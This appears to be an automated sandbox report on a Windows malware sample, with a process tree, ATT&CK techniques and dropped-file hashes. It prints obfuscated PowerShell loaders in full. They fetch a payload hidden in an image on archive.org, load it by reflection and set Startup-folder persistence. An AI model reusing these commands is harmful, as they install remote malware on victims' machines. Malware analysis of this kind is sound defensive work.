  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys32.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJAB2AGUAUgBiAG8AUwBFAHAAcgBFAEYARQByAGUAbgBDAGUALgBUAE8AUwB0AHIAaQBOAGcAKAApAFsAMQAsADMAXQArACcAWAAnAC0ASgBvAEkATgAnACcAKQAoACAAKAAoACcAMABUAFkAaQBtAGEAZwBlAFUAcgBsACAAPQAgADcASwBFAGgAdAB0AHAAcwAnACsAJwA6AC8ALwBpAGEANgAwADAAMQAwADEALgB1ACcAKwAnAHMALgBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwAxAC8AaQB0AGUAbQBzAC8AZABlAHQAYQBoAC0AbgBvAHQAZQAtAGoAXwAyADAAMgA0ADEAMAAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAJwArACcAcABnACAANwAnACsAJwBLAEUAOwAwAFQAWQB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAMABUAFkAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAwAFQAWQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3ACcAKwAnAG4AbABvAGEAZAAnACsAJwBEAGEAdABhACgAMABUAFkAaQBtAGEAZwBlAFUAcgBsACkAOwAwAFQAWQBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQAnACsAJwBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAwAFQAWQBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAwAFQAJwArACcAWQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAA3AEsARQA8ADwAQgAnACsAJwBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ADcAJwArACcASwAnACsAJwBFACcAKwAnADsAMABUAFkAZQBuAGQARgBsAGEAZwAgAD0AIAA3AEsARQA8ADwAQgBBAFMARQA2ADQAXwAnACsAJwBFAE4ARAA+AD4ANwBLACcAKwAnAEUAOwAwAFQAWQBzAHQAYQByAHQASQBuACcAKwAnAGQAZQB4ACAAPQAgADAAVABZAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAJwArACcAZQB4AE8AZgAoADAAVABZAHMAdABhAHIAdABGAGwAYQBnACkAOwAwAFQAWQBlAG4AZABJAG4AJwArACcAZABlAHgAIAAnACsAJwA9ACAAMABUAFkAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAMABUAFkAZQBuAGQARgBsAGEAZwApADsAMABUAFkAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAwAFQAWQBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgADAAVABZAHMAdABhAHIAdABJAG4AZABlAHgAOwAwAFQAJwArACcAWQBzAHQAYQByAHQASQBuAGQAZQB4ACAAJwArACcAKwA9ACAAMABUAFkAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ADAAVABZAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgADAAVABZAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAwAFQAWQBzAHQAYQByAHQASQBuAGQAZQB4ADsAJwArACcAMABUAFkAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAwAFQAJwArACcAWQBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiACcAKwAnAHMAdAByAGkAbgBnACgAMABUAFkAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAMABUAFkAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ADAAVABZAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQAnACsAJwBzACAAPQAgAFsAJwArACcAUwB5AHMAdABlAG0ALgBDAG8AbgB2ACcAKwAnAGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAwAFQAWQBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAwAFQAWQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAJwArACcAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoADAAVABZAGMAbwBtAG0AYQBuAGQAJwArACcAQgB5AHQAZQBzACkAOwAwAFQAWQB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgANwBLAEUAVgBBAEkANwBLAEUAKQA7ADAAVABZAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAwAFQAWQBuACcAKwAnAHUAbABsACwAIABAACgANwBLAEUAMAAvAFcAYwBtAEQASQAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoADcASwBFACwAIAA3AEsARQAxADcASwBFACwAIAA3AEsARQBDADoAdABiADAAUAByAG8AZwByAGEAbQBEAGEAdABhAHQAYgAwADcASwBFACwAIAAnACsAJwA3AEsARQBjAGUAcgB0AGUAaQByAGEAbQBlAG4AdABlADcASwBFACwAIAA3AEsARQBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIANwBLAEUALAAgADcASwBFAGQAZQBzAGEAdABpAHYAYQBkAG8ANwBLAEUALAAgADcASwBFAGQAZQBzAGEAdABpAHYAYQBkACcAKwAnAG8ANwBLAEUAKQApADsAJwApAC0AQwBSAGUAUABsAEEAQwBFACAAIAAnAHQAYgAwACcALABbAEMASABBAFIAXQA5ADIAIAAgAC0AQwBSAGUAUABsAEEAQwBFACAAKABbAEMASABBAFIAXQA1ADUAKwBbAEMASABBAFIAXQA3ADUAKwBbAEMASABBAFIAXQA2ADkAKQAsAFsAQwBIAEEAUgBdADMAOQAtAFIARQBQAGwAQQBDAGUAIAAnADAAVABZACcALABbAEMASABBAFIAXQAzADYAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $veRboSEprEFErenCe.TOStriNg()[1,3]+'X'-JoIN'')( (('0TYimageUrl = 7KEhttps'+'://ia600101.u'+'s.archive.org/1/items/detah-note-j_202410/DetahNote_J.j'+'pg 7'+'KE;0TYwebClient = New-Object System.Net.WebClient;0TYimageBytes = 0TYwebClient.Dow'+'nload'+'Data(0TYimageUrl);0TYimageText = [Syste'+'m.Text.Encoding]::UTF8.GetString(0TYimageBytes);0T'+'YstartFlag = 7KE<<B'+'ASE64_START>>7'+'K'+'E'+';0TYendFlag = 7KE<<BASE64_'+'END>>7K'+'E;0TYstartIn'+'dex = 0TYimageText.Ind'+'exOf(0TYstartFlag);0TYendIn'+'dex '+'= 0TYimageText.IndexOf(0TYendFlag);0TYstartIndex -ge 0 -and 0TYendIndex -gt 0TYstartIndex;0T'+'YstartIndex '+'+= 0TYstartFlag.Length;0TYbase64Length = 0TYendIndex - 0TYstartIndex;'+'0TYbase64Command = 0T'+'YimageText.Sub'+'string(0TYstartIndex, 0TYbase64Length);0TYcommandByte'+'s = ['+'System.Conv'+'ert]::FromBase64String(0TYbase64Command);0TYloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(0TYcommand'+'Bytes);0TYvaiMethod = [dnlib.IO.Home].GetMethod(7KEVAI7KE);0TYvaiMethod.Invoke(0TYn'+'ull, @(7KE0/WcmDI/d/ee.etsap//:sptth7KE, 7KE17KE, 7KEC:tb0ProgramDatatb07KE, '+'7KEcerteiramente7KE, 7KEAddInProcess327KE, 7KEdesativado7KE, 7KEdesativad'+'o7KE));')-CRePlACE 'tb0',[CHAR]92 -CRePlACE ([CHAR]55+[CHAR]75+[CHAR]69),[CHAR]39-REPlACe '0TY',[CHAR]36) )"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:516
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\certeiramente.js"
        5⤵
        
        PID:3836
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
- C:\Windows\system32\wscript.exe
  "wscript.exe" C:\Users\Public\Documents\sys64.js
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Drops startup file
  PID:2892
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys64.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1772
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys64.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAGsAZQBtAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABYAFYAaABoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAwADEAMAAxAC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAvAGkAdABlAG0AcwAvAGQAZQB0AGEAaAAtAG4AbwB0AGUALQBqAF8AMgAwADIANAAxADAALwBEACcAKwAnAGUAdABhAGgATgBvAHQAZQBfAEoALgBqAHAAZwAgAFgAVgBoADsAawBlAG0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AGsAZQBtAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAawBlAG0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuACcAKwAnAGwAbwBhAGQARABhAHQAYQAoAGsAZQBtACcAKwAnAGkAbQBhACcAKwAnAGcAZQBVAHIAbAApADsAawBlAG0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ACcAKwAnADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAawBlAG0AaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAawBlAG0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAWABWAGgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBYAFYAaAA7AGsAZQBtAGUAbgBkAEYAbABhAGcAIAA9ACAAWABWAGgAPAA8ACcAKwAnAEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AFgAVgBoADsAawBlAG0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACcAKwAnAD0AIABrAGUAbQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABrAGUAbQBzAHQAYQByAHQARgBsAGEAZwApADsAawBlAG0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAGsAZQBtAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAGsAZQBtAGUAbgBkAEYAbABhAGcAKQA7AGsAZQBtAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAawBlAG0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIABrAGUAbQBzAHQAYQByAHQASQBuAGQAZQB4ADsAawBlAG0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAGsAZQBtAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBrAGUAbQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABrAGUAbQBlACcAKwAnAG4AZABJAG4AZAAnACsAJwBlAHgAIAAtACAAawBlAG0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGsAZQBtAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAawBlAG0AaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAGsAZQBtAHMAdABhAHIAdABJAG4AZABlAHgALAAgAGsAZQBtAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBrAGUAbQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AJwArACcAdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAawBlAG0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAawBlAG0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgAnACsAJwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABrAGUAbQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAnACsAJwApADsAawBlAG0AdgBhAGkATQBlAHQAaABvAGQAJwArACcAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoAFgAVgBoAFYAQQBJAFgAVgBoACkAOwBrAGUAbQB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAawBlAG0AbgB1AGwAbAAsACAAQAAoAFgAVgBoADAALwAnACsAJwBLADIAYQBZAFIALwBkAC8AZQBlACcAKwAnAC4AZQB0AHMAJwArACcAYQBwAC8ALwA6AHMAcAB0AHQAaABYAFYAaAAsACAAWABWAGgAJwArACcAMQBYAFYAaAAsACAAWABWAGgAQwA6AHcASABxAFAAcgBvAGcAcgBhAG0ARABhAHQAYQB3AEgAJwArACcAcQBYAFYAaAAsACAAWABWAGgAbABhAHQAaQBuAGEAcwBYAFYAaAAsACAAWABWAGgAQQAnACsAJwBwAHAATABhAHUAbgBjAGgAWABWAGgALAAgAFgAVgBoAGQAZQBzAGEAdAAnACsAJwBpAHYAYQBkAG8AWABWAGgALAAgAFgAVgBoAGQAZQBzAGEAdABpAHYAYQBkAG8AWABWAGgAKQApADsAJwApAC4AcgBlAFAATABBAGMAZQAoACgAWwBDAGgAYQBSAF0AMQAxADkAKwBbAEMAaABhAFIAXQA3ADIAKwBbAEMAaABhAFIAXQAxADEAMwApACwAWwBTAFQAUgBJAG4AZwBdAFsAQwBoAGEAUgBdADkAMgApAC4AcgBlAFAATABBAGMAZQAoACgAWwBDAGgAYQBSAF0AOAA4ACsAWwBDAGgAYQBSAF0AOAA2ACsAWwBDAGgAYQBSAF0AMQAwADQAKQAsAFsAUwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQAzADkAKQAuAHIAZQBQAEwAQQBjAGUAKAAnAGsAZQBtACcALAAnACQAJwApACAAfAAgAC4AIAAoACAAJABwAHMASABvAE0ARQBbADIAMQBdACsAJABQAFMASABvAE0ARQBbADMANABdACsAJwB4ACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kemimageUrl = XVhhttps://ia600101.us.archive.org/1/items/detah-note-j_202410/D'+'etahNote_J.jpg XVh;kemwebClient = New-Object System.Net.WebClient;kemimageBytes = kemwebClient.Down'+'loadData(kem'+'ima'+'geUrl);kemimageText = [System.Text.Encoding]:'+':UTF8.GetString(kemimageBytes);kemstartFlag = XVh<<BASE64_START>>XVh;kemendFlag = XVh<<'+'BASE64_END>>XVh;kemstartIndex '+'= kemimageText.IndexOf(kemstartFlag);kemendIndex = kemimageText.IndexOf(kemendFlag);kemstartIndex -ge 0 -and kemendIndex -gt kemstartIndex;kemstartIndex += kemstartFlag.Length;kembase64Length = keme'+'ndInd'+'ex - kemstartIndex;kembase64Command = kemimageText.Substring(kemstartIndex, kembase64Length);kemcommandBytes = [System.Con'+'vert]::FromBase64String(kembase64Command);kemloadedAssembly = [System.'+'Reflection.Assembly]::Load(kemcommandBytes'+');kemvaiMethod'+' = [dnlib.IO.Home].GetMethod(XVhVAIXVh);kemvaiMethod.Invoke(kemnull, @(XVh0/'+'K2aYR/d/ee'+'.ets'+'ap//:sptthXVh, XVh'+'1XVh, XVhC:wHqProgramDatawH'+'qXVh, XVhlatinasXVh, XVhA'+'ppLaunchXVh, XVhdesat'+'ivadoXVh, XVhdesativadoXVh));').rePLAce(([ChaR]119+[ChaR]72+[ChaR]113),[STRIng][ChaR]92).rePLAce(([ChaR]88+[ChaR]86+[ChaR]104),[STRIng][ChaR]39).rePLAce('kem','$') | . ( $psHoME[21]+$PSHoME[34]+'x')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3064
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\latinas.js"
        5⤵
        
        PID:1452
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
- C:\Windows\system32\cmd.exe
  "cmd" /C echo %username%
  2⤵
  PID:1756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
c59ac7fc570c17efc1d4f04daf1f6f07

SHA1
ceda06f67fa8b4f974947579ec183ef82332ef25

SHA256
e6b8f1e1ddf0b7a873a66b4058885e273c9a9614c26190985e8933f53c532eb8

SHA512
2683fda604410c14e2b10276c1f9038df96559cf5c85d5f934505434880a66634a6dc95ae518c97d8e736aa648152a827390d9d24f29b36616c2257112e1294a

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
12c3909ceec542aa272ef9042293a05d

SHA1
f447e7e76f9d1a97994ae90b0604801aea401241

SHA256
f8b41b02e40f2bd9828c89f8728b5ce07f0b23f42dc2d2fd4a6eb2a2835e4576

SHA512
9ee7b42fcaa09f5653350439450bea42bb22236561d8f192af6599571eb5c9810f07742d5d52f3946c1501a10548aeb25a5a60e1840612802b5bc87ac3c7ce3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cb86ca7f8f9cf68c2cc02cbaed02c04f

SHA1
e1475066846b2a350c4ffc65adb757f21c268b3c

SHA256
f191fbdad34152f598e5d5720c81b6c3b2f0305fda1a3f65ff6326ce126f3a6c

SHA512
60bcca478fb4f92f1651667ab2455f971c90b0356c5a2f47b3bb25ce25566a13ba667e27a89c9544c5734fe5c3816c86abbd24f82e66cdd8ebb3ab8a38400dd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
89fc5a9d0d466a7067ab953de16aa1c7

SHA1
6c0406ac9392012322556da6aaaccac99dd3e0bc

SHA256
73be48e135eedf10db43bcd9b1e424792249b6a5ddf3455ff0174c4ac0cbb42f

SHA512
8010ad88307df2959a02f10d97d76d1e9f617617458ac1e39f029a1856ced7ebf250f8deca48d7d04a2fdea3838e26529120dde7d171a0efb976b722d44d8497

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ipdu4dw.tf3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf

Filesize
95KB

MD5
0a38b2745ee17418757b89ed83bf67e9

SHA1
5e48606d911b66288a4635b804b23096b4153bbe

SHA256
00f9505695f17f040c9464e7b62c1eaa7e6b08e64db30a715e0826547b953730

SHA512
4b25823c795776eaa3ce488d71b39fd671d0d58ee3c942201ded7d8fd5076635c6eb96ac1a8f67e342914cb39f69444adeae1427dc5c62d29afc57ea97513766

Download Submit
C:\Users\Public\Documents\sys32.js

Filesize
3KB

MD5
bc7244aee3bf10a799a65d7f9deef0f4

SHA1
d1aa7166248c237033e2974659b9db57f2246eca

SHA256
e67d0735f544b2756fc90950c1fc094cbae7bb4cabf53f76a2d65c950b252fca

SHA512
219d57c486471c02317efcb462c4796e0af55676a5931541855f54a31af8ba4df12b5d3e019294d8cac647c9f0972ca655e03517862870846ea1c7e93dedb855

Download Submit
C:\Users\Public\Documents\sys64.js

Filesize
3KB

MD5
144898fc1178eac98ffad2048884b0bc

SHA1
af869238a636b1d0a02d48cb9683bc30cf13857c

SHA256
21832cffce9087a2dfe4a21bd1f069b06bf7cfafe87540eb09afbac8c10cb19a

SHA512
bb2a56791848acfe12960eb38f58f57a1b4785d27499c4ec888a4144e2211cb1a28bdf5e0494d457e844868e63c6a0274f42c0d49928de26f19f53742846f7fe

Download Submit
memory/516-196-0x00000174C83D0000-0x00000174C85F0000-memory.dmp

Filesize
2.1MB

Download
memory/1336-46-0x000001E2DB650000-0x000001E2DB672000-memory.dmp

Filesize
136KB

Download
memory/2032-216-0x0000000007220000-0x00000000072B2000-memory.dmp

Filesize
584KB

Download
memory/2032-199-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2032-203-0x0000000005700000-0x000000000579C000-memory.dmp

Filesize
624KB

Download
memory/2032-217-0x0000000007870000-0x0000000007E14000-memory.dmp

Filesize
5.6MB

Download
memory/2356-204-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/2356-211-0x00000000054D0000-0x0000000005536000-memory.dmp

Filesize
408KB

Download
memory/2356-210-0x00000000059C0000-0x0000000005FD8000-memory.dmp

Filesize
6.1MB

Download
memory/2356-209-0x0000000005260000-0x000000000531C000-memory.dmp

Filesize
752KB

Download